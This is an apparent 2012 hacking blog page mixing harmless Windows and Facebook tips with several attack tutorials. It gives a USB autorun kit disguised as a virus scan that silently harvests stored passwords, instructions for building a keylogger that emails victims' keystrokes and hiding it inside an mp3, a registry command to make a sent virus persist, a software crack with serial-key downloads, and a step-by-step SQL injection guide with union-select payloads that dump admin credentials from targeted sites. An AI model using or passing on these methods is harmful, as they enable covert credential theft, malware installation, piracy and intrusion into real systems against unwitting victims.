Search This Blog

Friday, 18 May 2012

How to Sniff/Hack Passwords Using USB Drive?

As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to sniff passwords from any computer. We need the following tools to create our rootkit.





MessenPassRecovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.
Mail PassViewRecovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.
IE PassviewIE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 – v6.0
Protected Storage PassViewRecovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…
PasswordFoxPasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename. 
Here is a step by step procedre to create the password hacking toolkit.
NOTE: You must temporarily disable your antivirus before following these steps.
1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.
ie: Copy the files – mspass.exemailpv.exeiepv.exepspv.exe and passwordfox.exe into your USB Drive.
2. Create a new Notepad and write the following text into it
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
save the Notepad as all files and rename it from
New Text Document.txt to autorun.inf
Now copy the autorun.inf file onto your USB pendrive.
3. Create another Notepad and write the following text onto it.
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
save the Notepad and rename it from
New Text Document.txt to launch.bat
Copy the launch.bat file also to your USB drive.
Now your rootkit is ready and you are all set to sniff the passwords. You can use this pendrive on on any computer to sniff the stored passwords. Just follow these steps
1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).
2. In the pop-up window, select the first option (Perform a Virus Scan).
3. Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.
4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.
This hack works on Windows 2000, XP and Vista

Avira Antivirus Premium 2012 12.0.0.865 [Final] [Crack] [Serial Key]

Avira AntiVir Premium reliably protects you against all threats from viruses, worms, trojans, rootkits, phishings, adware, spyware, bots and dangerous “drive-by” downloads. Best detection rates and top-class security with several updates every day. Advanced protection:
Includes basic antivirus protection PLUS: email protection (POP3), AntiPhishing, AntiSpyware, AntiAdware and more. With real-time on-access scanning, profile-based on-demand scans and scheduling of full system scanning and updates it offers premium protection. It includes a POP3 based MailScanner that scans emails before they are stored on your machine. With a user-friendly control center, quarantine management, fast performance and world leading detection rates the Avira AntiVir Premium provides essential protection for your PC.

AntiVir Personal offers effective protection against computer viruses for the individual and private use on a single PC-workstation. It detects and removes viruses and includes an Internet-Update Wizard for easy updating.


Avira presents the Premium Security Suite with Full protection: Includes basic and advanced antivirus protection, email protection, AntiPhishing, Anti-Spyware and Anti-Adware PLUS: Anti-Spam, Firewall, WebGuard (Safe Surfing), Game Mode and more.! Complete security for workstations! The repeatedly awarded and worldwide used virus and malware protection by over 30 million users now also with WebGuard!
Avira is a German antivirus software company. Its antivirus applications are based on the AntiVir antivirus engine, first launched in 1988. It was called "H+BEDV Datentechnik GmbH" when it was founded. One of the antivirus software, AntiVir Personal, is free for personal usage. Avira is launching a new, comprehensive protection package for end-users as well as small offices and home workers: the Avira Premium Security Suite is a combination of Avira’s brand-new firewall and the proven anti-virus software AntiVir Personal Premium.

Even less experienced users can cope with the numerous security threats from the Internet with the central, intuitively operated user interface of the Suite
 


Serials Works Till 21.1.2012 (Will Update It) 

Image 



Operating systems : 


Works On 32bit/64bit 


Download Links : 


Avira Antivirus Premium



http://premium.avira-update.com/package/wks_avira/win32/en/pepr/avira_antivirus_premium_en.exe


Serial Keys:


http://rapidshare.com/files/2339055374/Avira_New_Keys.rar




INSTRUCTIONS:


Download the Avira Premium Antivirus 2012 from there official site and open it. While installing where it ask for key upload the Any of the Avira Key that you have downloaded from here . And just let is install BUT REMEMBER TURN OFF YOUR INTERNET OTHER WISE IT WONT WORK!

e Hacking Facebook Account Password using Free Emissary Keylogger

Not all hacking softwares and keyloggers are Anti-Spywares Shielded. Most Antivirus Softwares are familiar with these free keyloggers and they might flag this keylogger as a Virus. So to experience this keylogger you might need to temporarily turn off your antivirus or uninstall it. But Don’t worry, if your victims antivirus is not up to date or freeone, there are high chances that you may end up getting his keylogs. So give it a Try.

-Features of Emissary Keylogger:

  • Can mail all the Keystrokes including login details
  • Can send screenshots of the victim’s Screen
  • Can Block VirusScanning Websites on victim’s computer
  • Can Disable TaskManager on victim’s PC
  • Can Disable Regedit on victim’s PC

-How to Use this Keylogger to hack Facebook Password?

First make sure you have ‘Microsoft’s .net Framework‘ installed on your PC, if you dont have please download and install it. [*] The victim need not have .net framework. Follow the Steps below:
Step 1: Download ‘Emissary Keylogger‘ Software and extract the files to desktop. If your Antivirus deletes the file, then please turnoff your Antivirus or uninstall it and try downloading again.
Step 2: Run ‘Emissary.exe’ file and enter your gmail account details,  so that the password and other info of your victim can be mailed to you. If you are afraid of entering your gmail details, then do create one temporary fake account and enter those details.
Download Free Emissary Keylogger Software
Step 3: After you enter your ‘Gmail account’ details Click on ‘Test’ to test the connection to your Gmail account.  In the Server name Field you can change the name if you want. enter any Time Interval in the interval field. This timer controls the time interval between two keylogs emails. You can also show fake error message to your Victim when he clicks your server.exe file. to do so enter the error title and description in the ‘Fake error message’ field.
Hacking Facebook Account Password using Free Emissary Keylogger Software How to hack into someones facebook Profile
Step4: Now after filling the required fields, Click ‘Build’ button. This will create another file called server.exe in the same directory.
Step5: Now send this server.exe file to victim and make him install it on his computer. You can use Binder or Crypter to bind this server.exe file with say any .mp3 file so that whenever victim runs mp3 file, server is automatically installed on his computer without his knowledge. also read: How to change ICON of .exe file?
How to hack into someones facebook Profile id account facebook password hacking software free download
[ * ] Now because this is a free keylogger, you can’t send server.exe file via email. Almost all email domains have security policy which does not allow sending .exe files. So to do this you need to compress the file with WinRar or upload it to Free File Storage Domains, like Mediafire, rapidshare, filethief etc.
Step6: Once the victim runs your sent keylogger file on his computer, it searches for all the stored usernames and passwords and it will send you email containing all keylogs and screenshots regularly after the specified ‘Time interval’.Facebook Account Password

How to Login to Any Website Without Registration?

Some of the websites force you to register your details and create your account first , to be able to get access to their downloads or any other features that they require an account. But this can be dangerous when a lot of websites are being hacked these days and your private information may be compromised when any of these sites get hacked. Also all these registration processes, wastes a lot of time in filling up those fields and confirming it via email etc. So here is a simple and quick solution that you can easily log into any websites without even having the hassle of registering or creating an account.

BugMeNot is a popular service that lets users share their login information ,so that  it could be used by others and hence be available for any website they are trying to log in.
You will just need to enter the website url in the box provided in the home page of  BugMeNot and it will return a list of login usernames and passwords for you to access the website with the percentage of success rates for each of the respective passwords.
So you can now login to majority of website without even registering or creating an account first.If you share your thoughts or want to share some sites similar to this please leave your suggestions on the comment section below.Cheers..:)
Url BugMeNot.Com

Monday, 7 May 2012

Execute virus on Start up

Hello guys,
You must be familiar with viruses and probably you must be knowing how we can create them. Once the virus get executed it will show its impact but it will last till the system is turn on, If you will turn off the system all the process of the virus will also get killed.
So our requirement is to run our virus again even if the system get rebooted. So for that we will have to send our virus on start up. But we don’t want to send it manually instead of that we would like to send it with the help of batch file.
So let us take we are having a virus demo.exe.
Follow the following steps for sending it on Start up.
1. Open a Notepad file
2. Write down the following command
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v demo /t REG_SZ /d demo.exe
3. Now save the notepad file with any name say kyrion but extension should be bat. Means we will have to create a batch file eg: kyrion.bat
4. Now send kyrion.bat along with demo.exe virus to your friend. Whenever he will click on kyrion.bat file automatically demo.exe will reach at the start up.
5. Now the impact of the virus will also be visible after the restart of the system.


NOTE:- dont try in ur own pc.

Facebook Trick

Chrome        Firefox                  Facebook
Alt+m           Shift+Alt+m           New Message
Alt+0            Shift+Alt+0            Help Center
Alt+1            Shift+Alt+1            Home Page
Alt+2            Shift+Alt+2            Profile Page
Alt+3            Shift+Alt+3            Manage Friend List
Alt+4            Shift+Alt+4            Message List
Alt+5            Shift+Alt+5            Notification Page
Alt+6            Shift+Alt+6            Account Settings
Alt+7            Shift+Alt+7            Privacy Settings
Alt+8            Shift+Alt+8            Facebook Fan Page
Alt+9            Shift+Alt+9            Facebook Terms
Alt+?            Shift+Alt+?              Search Box

Enjoy and Have Fun!!!

Saturday, 5 May 2012

Lock Desktop Icons

In this tutorial we’ll see how we can lock our desktop icons so that no one can make any changes to the icons that we have arranged in the desktop. Generally it happens when someone comes to our system and mess up the arrangement.
So for that open Registry and go to the following path

HKEY_CURRENT_USER\Software\Microsoft\Windows\Current Version\Policies\Explorer.

Right-click in the right pane and select New, DWORD Value name NoSaveSettings and press the Enter key. Right-click on the new NoSaveSettings item and select Modify. Enter 1 in the Value data box. After this, whenever you restart Windows, your settings will return to their current state.
Today I’m going to tell, how you can use any other SIM in IDEA NET SETTER and then you can access upto 2mbps via that USB Net setter
Netsetter is using a Huawei modem
Step 1 : Download UNIVERSAL MASTER CODE (software) by THL
Step 2 : Now take your USB modem and see its back , you will see a 15 digit number and that’s your modem’s IMEI number .
Open notepad and type that IMEI no.
Step 3 : Now double click on the downloaded file of Universal Master Code and extract it then click on Universal Master Code.exe
Step 4 : In the IMEI number field of Universal Master Codetype , enter the IMEI number which you have already typed in notepad and press calculate.
It will generate a flash and unlock code.
Step 5 : Now connect your USB IDEA net setter and install net setter software from there and run it and also put a non IDEA SIM.
It will ask you for unlock code , also it will show u have 10 attempts ,simply put the unlock code generated from universal master code
And press enter while u have unlocked your IDEA net setter
Now for creating new profile go to Tools > Options > Profile Management and click new
Type APN supported by your sim (eg – for BSNL use bsnlnet as apn  ) , leave everything as it is and you can connect easily after that. Enjoy !! :)

Friday, 4 May 2012

Hacking website using SQL Injection -step by step guide

 Before we see what  SQL Injection is. We should know what SQL and Database are.

Database:
Database is collection of data. In website point of view, database is used for storing user ids,passwords,web page details and more.



Some List of Database are:

* DB servers,
* MySQL(Open source),
* MSSQL,
* MS-ACCESS,
* Oracle,
* Postgre SQL(open source),
* SQLite,



SQL:
Structured Query Language is Known as SQL. In order to communicate with the Database ,we are using SQL query. We are querying the database so it is called as Query language.

Definition from Complete reference:

SQL is a tool for organizing, managing, and retrieving data stored by a computer
database. The name "SQL" is an abbreviation for Structured Query Language. For
historical reasons, SQL is usually pronounced "sequel," but the alternate pronunciation
"S.Q.L." is also used. As the name implies, SQL is a computer language that you use to
interact with a database. In fact, SQL works with one specific type of database, called a
relational database.

Simple Basic Queries for SQL:

Select * from table_name :
this statement is used for showing the content of tables including column name.
For eg:
select * from users;

Insert into table_name(column_names,...) values(corresponding values for columns):
For inserting data to table.
For eg:
insert into users(username,userid) values("BreakTheSec","break");

I will give more detail and query in my next thread about the SQL QUERY.

What is SQL Injection?
SQL injection is Common and famous method of hacking at present . Using this method an unauthorized person can access the database of the website. Attacker can get all details from the Database.

What an attacker can do?

* ByPassing Logins
* Accessing secret data
* Modifying contents of website
* Shutting down the My SQL server

Now let's dive into the real procedure for the SQL Injection.
Follow my steps.

Step 1: Finding Vulnerable Website:
Our best partner for SQL injection is Google. We can find the Vulnerable websites(hackable websites) using Google Dork list. google dork is searching for vulnerable websites using the google searching tricks. There is lot of tricks to search in google. But we are going to use "inurl:" command for finding the vulnerable websites.

Some Examples:
inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=

Here is the huge list of Google Dork
http://www.ziddu.com/download/13161874/A...t.zip.html

How to use?
copy one of the above command and paste in the google search engine box.
Hit enter.
You can get list of web sites.
We have to visit the websites one by one for checking the vulnerability.
So Start from the first website.


Note:if you like to hack particular website,then try this:
site:www.victimsite.com dork_list_commands
for eg:
site:www.victimsite.com inurl:index.php?id=
 Step 2: Checking the Vulnerability:
Now we should check the vulnerability of websites. In order to check the vulnerability ,add the single quotes(') at the end of the url and hit enter. (No space between the number and single quotes)

For eg:
http://www.victimsite.com/index.php?id=2'
 If the page remains in same page or showing that page not found or showing some other webpages. Then it is not vulnerable.

If it showing any errors which is related to sql query,then it is vulnerable. Cheers..!!
For eg:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

Step 3: Finding Number of columns:
Now we have found the website is vulnerable. Next step is to find the number of columns in the table.
For that replace the single quotes(') with "order by n" statement.(leave one space between number and order by n statement)

Change the n from 1,2,3,4,,5,6,...n. Until you get the error like "unknown column ".

For eg:
http://www.victimsite.com/index.php?id=2 order by 1
http://www.victimsite.com/index.php?id=2 order by 2
http://www.victimsite.com/index.php?id=2 order by 3
http://www.victimsite.com/index.php?id=2 order by 4
 change the number until you get the error as "unknown column"

if you get the error while trying the "x"th number,then no of column is "x-1".

I mean:
http://www.victimsite.com/index.php?id=2 order by 1(noerror)
http://www.victimsite.com/index.php?id=2 order by 2(noerror)
http://www.victimsite.com/index.php?id=2 order by 3(noerror)
http://www.victimsite.com/index.php?id=2 order by 4(noerror)
http://www.victimsite.com/index.php?id=2 order by 5(noerror)
http://www.victimsite.com/index.php?id=2 order by 6(noerror)
http://www.victimsite.com/index.php?id=2 order by 7(noerror)
http://www.victimsite.com/index.php?id=2 order by 8(error)

 
 so now x=8 , The number of column is x-1 i.e, 7.

Sometime the above may not work. At the time add the "--" at the end of the statement.
For eg:

http://www.victimsite.com/index.php?id=2 order by 1--

Step 4: Displaying the Vulnerable columns:
Using "union select columns_sequence" we can find the vulnerable part of the table. Replace the "order by n" with this statement. And change the id value to negative(i mean id=-2,must change,but in some website may work without changing).

Replace the columns_sequence with the no from 1 to x-1(number of columns) separated with commas(,).

For eg:
if the number of columns is 7 ,then the query is as follow:

http://www.victimsite.com/index.php?id=-2 union select 1,2,3,4,5,6,7--

If the above method is not working then try this:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,3,4,5,6,7--


It will show some numbers in the page(it must be less than 'x' value, i mean less than or equl to number of columns).

Like this:



Now select 1 number.
It showing 3,7. Let's take the Number 3.

Step 5: Finding version,database,user
Now replace the 3 from the query with "version()"

For eg:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,version(),4,5,6,7--


It will show the version as 5.0.1 or 4.3. something like this.

Replace the version() with database() and user() for finding the database,user respectively.

For eg:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,database(),4,5,6,7--

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,user(),4,5,6,7--

If the above is not working,then try this:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,unhex(hex(@@version)),4,5,6,7--



Step 6: Finding the Table Name
 if the version is 5 or above. Then follow these steps.  Now we have to find the table name of the database. Replace the 3 with "group_concat(table_name) and add the "from information_schema.tables where table_schema=database()"

For eg:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()--
 Now it will show the list of table names. Find the table name which is related with the admin or user.




Now select the "admin " table.

if the version is 4 or some others, you have to guess the table names. (user, tbluser).  It is hard and bore to do sql inection with version 4.

Step 7: Finding the Column Name

Now replace the "group_concat(table_name) with the "group_concat(column_name)"

Replace the "from information_schema.tables where table_schema=database()--" with "FROM information_schema.columns WHERE table_name=mysqlchar--

Now listen carefully ,we have to find convert the table name to MySql CHAR() string and replace mysqlchar with that .

Find MysqlChar() for Tablename:
First of all install the HackBar addon:
https://addons.mozilla.org/en-US/firefox/addon/3899/
Now
select sql->Mysql->MysqlChar()

This will open the small window ,enter the table name which you found. i am going to use the admin table name.

click ok

Now you can see the CHAR(numbers separated with commans) in the Hack toolbar.


Copy and paste the code at the end of the url instead of the "mysqlchar"
For eg:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)--

Now it will show the list of columns.
like admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pas ​ s,admin_id,admin_name,admin_password,ID_admin,admin_username,username,password..etc..


Now replace the replace group_concat(column_name) with group_concat(columnname,0x3a,anothercolumnname).

Columnname should be replaced from the listed column name.
anothercolumnname should be replace from the listed column name.


Now replace the " from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)" with the "from table_name"

For eg:
http://www.victimsite.com/index.php?id=-2
and 1=2 union select 1,2,group_concat(admin_id,0x3a,admin_password),4,5,6,7 from admin--

Sometime it will show the column is not found.
Then try another column names

Now it will Username and passwords.

Enjoy..!!cheers..!!

If the website has members then jock-bot for you. You will have the list of usernames and password.
Some time you may have the email ids also,enjoy you got the Dock which can produce the golden eggs.

Step 8: Finding the Admin Panel:
Just try with url like:
http://www.victimsite.com/admin.php
http://www.victimsite.com/admin/
http://www.victimsite.com/admin.html
http://www.victimsite.com:2082/
etc.
If you have luck ,you will find the admin page using above urls. or try this list .
Here is the list of admin urls:

http://www.ziddu.com/download/13163866/A...t.zip.html

Note:
This is just for educational purpose only. Discussing or Reading about thief technique is not crime but implementing.

List of websites to check whether website is safe to use or not

Here ,i list out some websites that helpful to identify whether site is safe or not :


1.MyWot:
WOT is a community-based, free safe surfing tool for browsers that provides website ratings & reviews to help web users as they search, surf & shop online.

website: www.mywot.com

2.VirusTotal:
VirusTotal is a free virus, malware and URL online scanning service. File checking is done with more than 40 antivirus solutions.
 
website: www.virustotal.com

3.Norton Safe Web, from Symantec
Look up website safety information and safe site rankings from Norton Safe Web from Symantec. Read what others think and write your site reviews.

website: safeweb.norton.com



4. Unmask Parasites
Free online website security service. Check your web pages for hidden illicit content (invisible spam links, iframes, malicious scripts and redirects).

website: www.unmaskparasites.com/

5. Google Diagnostic:
checks whether site hosts malware or not.

website: http://google.com/safebrowsing/diagnostic?site=target.com

6.Online Link Scan
Online Link Scan collects and summarizes the threat reports of the aforementioned Phishtank, AVG and Google Safe Browsing engines.

website: onlinelinkscan.com


I believe this list is enough to verify site is safe to user. These sites will helpful when you are doing static malware analysis process.

Thursday, 3 May 2012

Is it possible to Install Windows 8 Consumer Preview through Windows Virtual PC ?

No, Windows 8 is not supported on Windows Virtual PC:

You can install Windwos 8 Consumer Preview in the following Virtual Machine programs:
Oracle VM VirtualBox
VMware Player 4.0

How to setup yahoo mail in windows 8

Hi,
1.     Are you referring to setting default mail in Internet Explorer?
2.     Do you want to set it in Desktop Internet Explorer?
3.     Are you referring to configure yahoo mail to Mail App?
If you are referring to configure yahoo mail in mail app, as of now as of now you can only configure hotmail/live, Google and exchange accounts.
Let us know if it helps.

How can I remove my password for windows start up in windows 8 preview?

Are you able to go past the lock screen using the current password?

Perform the steps mentioned below and see if it helps.
a: Visit account.live.com
b
: Enter the user name and password and see if the live account is verified.
c: If you can log inside the account, then change the password.

Hope this information helps.

How can We remove windows 8 consumer preview?

The reason it's a beta test version instead of a released version is
that it still has bugs in it, and Microsoft is looking for beta test
users to inform them of other bugs as they are found.
In my view, unless you have a spare computer to install it on, and
enjoy doing beta testing of software and reporting of bugs to
Microsoft, installing such beta software is just looking for trouble.
For almost everyone, I strongly advise against running a beta test
version of an operating system, and waiting for it to be released.
To get rid of it, you need to do a clean installation of Windows 7,
Vista, XP, or whatever you were running before the Consumer Preview of
Windows 8.
Ken Blake, Microsoft MVP.
Blogger Widgets